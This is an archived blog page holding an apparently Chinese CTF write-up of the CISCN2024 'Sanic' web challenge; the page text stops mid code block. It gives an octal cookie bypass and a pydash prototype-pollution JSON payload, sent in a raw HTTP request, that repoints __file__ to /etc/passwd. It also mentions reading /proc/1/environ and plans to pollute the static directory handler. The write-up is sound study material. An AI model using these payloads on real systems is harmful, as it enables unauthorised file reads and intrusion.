

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/biaotou.png">
  <link rel="icon" href="/img/biaotou.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="orange">
  <meta name="keywords" content="">
  
    <meta name="description" content="CISCN2024-WEB-Sanic &#x2F;src读取源码 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354from sanic import Sanicfrom sanic.response import text, htmlfrom sanic_">
<meta property="og:type" content="article">
<meta property="og:title" content="Sanic&amp;revenge">
<meta property="og:url" content="https://0ran9ewww.github.io/2025/01/15/%E6%AF%8F%E6%97%A5%E4%B8%80%E9%A2%98/Sanic&revenge/index.html">
<meta property="og:site_name" content="0raN9e的笔记">
<meta property="og:description" content="CISCN2024-WEB-Sanic &#x2F;src读取源码 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354from sanic import Sanicfrom sanic.response import text, htmlfrom sanic_">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://0ran9ewww.github.io/images/%E6%AF%8F%E6%97%A5%E4%B8%80%E9%A2%98/sanic.png">
<meta property="article:published_time" content="2025-01-14T17:00:00.000Z">
<meta property="article:modified_time" content="2025-01-14T17:46:40.893Z">
<meta property="article:author" content="orange">
<meta property="article:tag" content="Sanic">
<meta property="article:tag" content="python污染链">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://0ran9ewww.github.io/images/%E6%AF%8F%E6%97%A5%E4%B8%80%E9%A2%98/sanic.png">
  
  
  
  <title>Sanic&amp;revenge - 0raN9e的笔记</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"0ran9ewww.github.io","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"mhU37D1jfBAPsc6SNIXmdLb0-gzGzoHsz","app_key":"z8mFsDgOSQqDw1luWGGbCaCR","server_url":"https://mhu37d1j.lc-cn-n1-shared.com","path":"window.location.pathname","ignore_local":true}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  
    <!-- Google tag (gtag.js) -->
    <script async>
      if (!Fluid.ctx.dnt) {
        Fluid.utils.createScript("https://www.googletagmanager.com/gtag/js?id=", function() {
          window.dataLayer = window.dataLayer || [];
          function gtag() {
            dataLayer.push(arguments);
          }
          gtag('js', new Date());
          gtag('config', '');
        });
      }
    </script>
  

  

  

  

  
    
  



  
<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/katex@0.10.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.1.1"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>0raN9e的blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/images/%E6%AF%8F%E6%97%A5%E4%B8%80%E9%A2%98/sanic.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Sanic&amp;revenge"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-01-15 01:00" pubdate>
          2025年1月15日 凌晨
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          26 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">Sanic&amp;revenge</h1>
            
              <p id="updated-time" class="note note-info" style="">
                
                  
                    本文最后更新于 2025年1月15日 凌晨
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <h1 id="ciscn2024-web-sanic"><a class="markdownIt-Anchor" href="#ciscn2024-web-sanic"></a> CISCN2024-WEB-Sanic</h1>
<p><code>/src</code>读取源码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> sanic <span class="hljs-keyword">import</span> Sanic<br><span class="hljs-keyword">from</span> sanic.response <span class="hljs-keyword">import</span> text, html<br><span class="hljs-keyword">from</span> sanic_session <span class="hljs-keyword">import</span> Session<br><span class="hljs-keyword">import</span> pydash<br><span class="hljs-comment"># pydash==5.1.2</span><br><br><br><span class="hljs-keyword">class</span> <span class="hljs-title class_">Pollute</span>:<br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">__init__</span>(<span class="hljs-params">self</span>):<br>        <span class="hljs-keyword">pass</span><br><br><br>app = Sanic(__name__)<br>app.static(<span class="hljs-string">&quot;/static/&quot;</span>, <span class="hljs-string">&quot;./static/&quot;</span>)<br>Session(app)<br><br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/&#x27;</span>, methods=[<span class="hljs-string">&#x27;GET&#x27;</span>, <span class="hljs-string">&#x27;POST&#x27;</span>]</span>)</span><br><span class="hljs-keyword">async</span> <span class="hljs-keyword">def</span> <span class="hljs-title function_">index</span>(<span class="hljs-params">request</span>):<br>    <span class="hljs-keyword">return</span> html(<span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;static/index.html&#x27;</span>).read())<br><br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&quot;/login&quot;</span></span>)</span><br><span class="hljs-keyword">async</span> <span class="hljs-keyword">def</span> <span class="hljs-title function_">login</span>(<span class="hljs-params">request</span>):<br>    user = request.cookies.get(<span class="hljs-string">&quot;user&quot;</span>)<br>    <span class="hljs-keyword">if</span> user.lower() == <span class="hljs-string">&#x27;adm;n&#x27;</span>:<br>        request.ctx.session[<span class="hljs-string">&#x27;admin&#x27;</span>] = <span class="hljs-literal">True</span><br>        <span class="hljs-keyword">return</span> text(<span class="hljs-string">&quot;login success&quot;</span>)<br><br>    <span class="hljs-keyword">return</span> text(<span class="hljs-string">&quot;login fail&quot;</span>)<br><br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&quot;/src&quot;</span></span>)</span><br><span class="hljs-keyword">async</span> <span class="hljs-keyword">def</span> <span class="hljs-title function_">src</span>(<span class="hljs-params">request</span>):<br>    <span class="hljs-keyword">return</span> text(<span class="hljs-built_in">open</span>(__file__).read())<br><br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&quot;/admin&quot;</span>, methods=[<span class="hljs-string">&#x27;GET&#x27;</span>, <span class="hljs-string">&#x27;POST&#x27;</span>]</span>)</span><br><span class="hljs-keyword">async</span> <span class="hljs-keyword">def</span> <span class="hljs-title function_">admin</span>(<span class="hljs-params">request</span>):<br>    <span class="hljs-keyword">if</span> request.ctx.session.get(<span class="hljs-string">&#x27;admin&#x27;</span>) == <span class="hljs-literal">True</span>:<br>        key = request.json[<span class="hljs-string">&#x27;key&#x27;</span>]<br>        value = request.json[<span class="hljs-string">&#x27;value&#x27;</span>]<br>        <span class="hljs-keyword">if</span> key <span class="hljs-keyword">and</span> value <span class="hljs-keyword">and</span> <span class="hljs-built_in">type</span>(key) <span class="hljs-keyword">is</span> <span class="hljs-built_in">str</span> <span class="hljs-keyword">and</span> <span class="hljs-string">&#x27;_.&#x27;</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> key:<br>            pollute = Pollute()<br>            pydash.set_(pollute, key, value)<br>            <span class="hljs-keyword">return</span> text(<span class="hljs-string">&quot;success&quot;</span>)<br>        <span class="hljs-keyword">else</span>:<br>            <span class="hljs-keyword">return</span> text(<span class="hljs-string">&quot;forbidden&quot;</span>)<br><br>    <span class="hljs-keyword">return</span> text(<span class="hljs-string">&quot;forbidden&quot;</span>)<br><br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    app.run(host=<span class="hljs-string">&#x27;0.0.0.0&#x27;</span>)<br></code></pre></td></tr></table></figure>
<p>定位一下关键代码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&quot;/src&quot;</span></span>)</span><br><span class="hljs-keyword">async</span> <span class="hljs-keyword">def</span> <span class="hljs-title function_">src</span>(<span class="hljs-params">request</span>):<br>    <span class="hljs-keyword">return</span> text(<span class="hljs-built_in">open</span>(__file__).read())<br></code></pre></td></tr></table></figure>
<p>这里应该可以读取代码</p>
<p><code>/admin</code>有原生链的污染</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&quot;/login&quot;</span></span>)</span><br><span class="hljs-keyword">async</span> <span class="hljs-keyword">def</span> <span class="hljs-title function_">login</span>(<span class="hljs-params">request</span>):<br>    user = request.cookies.get(<span class="hljs-string">&quot;user&quot;</span>)<br>    <span class="hljs-keyword">if</span> user.lower() == <span class="hljs-string">&#x27;adm;n&#x27;</span>:<br>        request.ctx.session[<span class="hljs-string">&#x27;admin&#x27;</span>] = <span class="hljs-literal">True</span><br>        <span class="hljs-keyword">return</span> text(<span class="hljs-string">&quot;login success&quot;</span>)<br></code></pre></td></tr></table></figure>
<p>这里有要求需要cookie值进行绕过,由于<code>;</code>会提前截取，可以八进制绕过<code>\073</code></p>
<p>用<code>Cookie:user=&quot;adm\073n&quot;</code>,得到回显</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs bash">HTTP/1.1 200 OK<br>Server: nginx/1.20.1<br>Date: Tue, 14 Jan 2025 13:05:00 GMT<br>Content-Type: text/plain; charset=utf-8<br>Connection: keep-alive<br>Set-Cookie: session=d19942299eb4431e9a1bdac1abc081c9; Path=/; Max-Age=2592000; expires=Thu, 13-Feb-2025 13:05:00 GMT; HttpOnly<br>Access-Control-Allow-Methods: GET,POST,PUT,DELETE,OPTIONS<br>Access-Control-Allow-Credentials: <span class="hljs-literal">true</span><br>Access-Control-Expose-Headers: Content-Type,Cookies,Aaa,Date,Server,Content-Length,Connection<br>Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Authorization,x-auth-token,Cookies,Aaa,Date,Server,Content-Length,Connection<br>Access-Control-Max-Age: 1728000<br>Content-Length: 13<br><br>login success<br></code></pre></td></tr></table></figure>
<p>构造</p>
<p>这里用<code>\\\\.</code>进行绕过，跟进<code>pydash.set_(pollute, key, value)</code>看</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;key&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;__init__.__globals__.__file__&quot;</span><span class="hljs-punctuation">,</span><span class="hljs-attr">&quot;value&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;/etc/passwd&quot;</span><span class="hljs-punctuation">&#125;</span><br><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;key&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;__init__\\\\.__globals__\\\\.__file__&quot;</span><span class="hljs-punctuation">,</span><span class="hljs-attr">&quot;value&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;/etc/passwd&quot;</span><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs bash">POST /admin HTTP/1.1<br>Host: 797906f2-03a1-44b6-b3cb-7eae782ac05e.challenge.ctf.show<br>Sec-Ch-Ua: <span class="hljs-string">&quot;Microsoft Edge&quot;</span>;v=<span class="hljs-string">&quot;131&quot;</span>, <span class="hljs-string">&quot;Chromium&quot;</span>;v=<span class="hljs-string">&quot;131&quot;</span>, <span class="hljs-string">&quot;Not_A Brand&quot;</span>;v=<span class="hljs-string">&quot;24&quot;</span><br>Sec-Ch-Ua-Mobile: ?0<br>Sec-Ch-Ua-Platform: <span class="hljs-string">&quot;Windows&quot;</span><br>Upgrade-Insecure-Requests: 1<br>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0<br>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br>Sec-Fetch-Site: none<br>Sec-Fetch-Mode: navigate<br>Sec-Fetch-Dest: document<br>Accept-Encoding: gzip, deflate<br>Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6<br>Sec-Fetch-User: ?1<br>Cookie:session=d19942299eb4431e9a1bdac1abc081c9;<br>Priority: u=0, i<br>Connection: close<br>Content-Type: application/json<br>Content-Length: 69<br><br>&#123;<span class="hljs-string">&quot;key&quot;</span>:<span class="hljs-string">&quot;__init__\\\\.__globals__\\\\.__file__&quot;</span>,<span class="hljs-string">&quot;value&quot;</span>:<span class="hljs-string">&quot;/etc/passwd&quot;</span>&#125;<br></code></pre></td></tr></table></figure>
<p>进到<code>/src</code>里读</p>
<p>（ps:这里读<code>/proc/1/environ</code>在ctfshow就能读了)</p>
<p>这里跟进<code>app.static</code>,看一下注释(翻译后)</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><code class="hljs markdown">&quot;&quot;&quot; 注册一个根目录以提供文件服务。输入可以是文件或目录。<br><br>此方法提供了一种简单便捷的方式来设置用于提供静态文件的路由。<br><br>参数：<br><br>uri (str)：用于提供静态内容的 URL 路径。<br>file<span class="hljs-emphasis">_or_</span>directory (Union[PathLike, str])：静态文件或包含静态文件的目录路径。<br>pattern (str, optional)：用于标识有效静态文件的正则表达式模式。默认为 r&quot;/?.+&quot;。<br>use<span class="hljs-emphasis">_modified_</span>since (bool, optional)：如果为 True，则发送文件修改时间，如果浏览器的修改时间与服务器匹配则返回未修改状态。默认为 True。<br>use<span class="hljs-emphasis">_content_</span>range (bool, optional)：如果为 True，处理范围请求头并发送所请求的文件部分。默认为 False。<br>stream<span class="hljs-emphasis">_large_</span>files (Union[bool, int], optional)：如果为 True，使用 StreamingHTTPResponse.file<span class="hljs-emphasis">_stream 处理器而不是 HTTPResponse.file 处理器发送文件。如果是一个整数，则表示切换到 StreamingHTTPResponse.file_</span>stream 的阈值大小。默认为 False，表示响应不会以流方式发送。<br>name (str, optional)：用户定义的名称，用于 url<span class="hljs-emphasis">_for。默认为 &quot;static&quot;。</span><br><span class="hljs-emphasis">host (Optional[str], optional)：服务使用的主机 IP 或完全限定域名 (FQDN)。</span><br><span class="hljs-emphasis">strict_</span>slashes (Optional[bool], optional)：指示 Sanic 是否检查请求 URL 是否需要以斜杠结尾。<br>content<span class="hljs-emphasis">_type (Optional[str], optional)：用户定义的响应头内容类型。</span><br><span class="hljs-emphasis">apply (bool, optional)：如果为 True，将立即注册路由。默认为 True。</span><br><span class="hljs-emphasis">resource_</span>type (Optional[str], optional)：显式声明资源为 &quot;file&quot; 或 &quot;dir&quot;。<br>index (Optional[Union[str, Sequence[str]]], optional)：当暴露一个目录时，index 是将作为默认文件提供的名称。如果传递了多个文件名，将按顺序尝试。<br>directory<span class="hljs-emphasis">_view (bool, optional)：是否回退到显示目录视图（当暴露的是一个目录时）。默认为 False。</span><br><span class="hljs-emphasis">directory_</span>handler (Optional[DirectoryHandler], optional)：一个 DirectoryHandler 实例，可用于显式控制和子类化默认目录处理程序的行为。<br>返回：<br><br>List[sanic.router.Route]：在路由器上注册的路由。<br>示例：<br><br>提供单个文件服务：<br><br>python<br>复制代码<br>app.static(&#x27;/foo&#x27;, &#x27;path/to/static/file.txt&#x27;)<br>提供目录中的所有文件服务：<br><br>python<br>复制代码<br>app.static(&#x27;/static&#x27;, &#x27;path/to/static/directory&#x27;)<br>为大文件提供服务并设置特定的阈值：<br><br>python<br>复制代码<br>app.static(&#x27;/static&#x27;, &#x27;path/to/large/files&#x27;, stream<span class="hljs-emphasis">_large_</span>files=1000000)<br>&quot;&quot;&quot;<br></code></pre></td></tr></table></figure>
<p>主要看的是</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs markdown">directory<span class="hljs-emphasis">_view (bool, optional)：是否回退到显示目录视图（当暴露的是一个目录时）。默认为 False。</span><br><span class="hljs-emphasis">directory_</span>handler (Optional[DirectoryHandler], optional)：一个 DirectoryHandler 实例，可用于显式控制和子类化默认目录处理程序的行为。<br></code></pre></td></tr></table></figure>
<p><code>directory_view</code>为true的时候会展示目录，directory_handler中可以获取指定的目录，继续跟进，看到调用了DirectoryHandler这个类，那继续跟进这个类中</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> directory_handler:<br>           directory_handler = DirectoryHandler(<br>               uri=uri,<br>               directory=file_or_directory,<br>               directory_view=directory_view,<br>               index=index,<br>           )<br></code></pre></td></tr></table></figure>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">def</span> <span class="hljs-title function_">__init__</span>(<span class="hljs-params"></span><br><span class="hljs-params">    self,</span><br><span class="hljs-params">    uri: <span class="hljs-built_in">str</span>,</span><br><span class="hljs-params">    directory: Path,</span><br><span class="hljs-params">    directory_view: <span class="hljs-built_in">bool</span> = <span class="hljs-literal">False</span>,</span><br><span class="hljs-params">    index: <span class="hljs-type">Optional</span>[<span class="hljs-type">Union</span>[<span class="hljs-built_in">str</span>, <span class="hljs-type">Sequence</span>[<span class="hljs-built_in">str</span>]]] = <span class="hljs-literal">None</span>,</span><br><span class="hljs-params"></span>) -&gt; <span class="hljs-literal">None</span>:<br>    <span class="hljs-keyword">if</span> <span class="hljs-built_in">isinstance</span>(index, <span class="hljs-built_in">str</span>):<br>        index = [index]<br>    <span class="hljs-keyword">elif</span> index <span class="hljs-keyword">is</span> <span class="hljs-literal">None</span>:<br>        index = []<br>    <span class="hljs-variable language_">self</span>.base = uri.strip(<span class="hljs-string">&quot;/&quot;</span>)<br>    <span class="hljs-variable language_">self</span>.directory = directory<br>    <span class="hljs-variable language_">self</span>.directory_view = directory_view<br>    <span class="hljs-variable language_">self</span>.index = <span class="hljs-built_in">tuple</span>(index)<br></code></pre></td></tr></table></figure>
<p>只要我们将directory污染为根目录，directory_view污染为True，就可以看到根目录的所有文件</p>
<p>这个框架可以通过**app.router.name_index[‘xxxxx’]**来获取注册的路由，我们可以打印稍微修改代码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> sanic <span class="hljs-keyword">import</span> Sanic<br><span class="hljs-keyword">from</span> sanic.response <span class="hljs-keyword">import</span> text, html<br><span class="hljs-comment">#from sanic_session import Session</span><br><span class="hljs-keyword">import</span> pydash<br><span class="hljs-keyword">import</span> sys<br><span class="hljs-comment"># pydash==5.1.2</span><br><br><br><span class="hljs-keyword">class</span> <span class="hljs-title class_">Pollute</span>:<br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">__init__</span>(<span class="hljs-params">self</span>):<br>        <span class="hljs-keyword">pass</span><br><br><br>app = Sanic(__name__)<br>app.static(<span class="hljs-string">&quot;/static/&quot;</span>, <span class="hljs-string">&quot;./static/&quot;</span>)<br><span class="hljs-comment">#Session(app)</span><br><br><br><span class="hljs-comment"># @app.route(&#x27;/&#x27;, methods=[&#x27;GET&#x27;, &#x27;POST&#x27;])</span><br><span class="hljs-comment"># async def index(request):</span><br><span class="hljs-comment">#     return html(open(&#x27;static/index.html&#x27;).read())</span><br><span 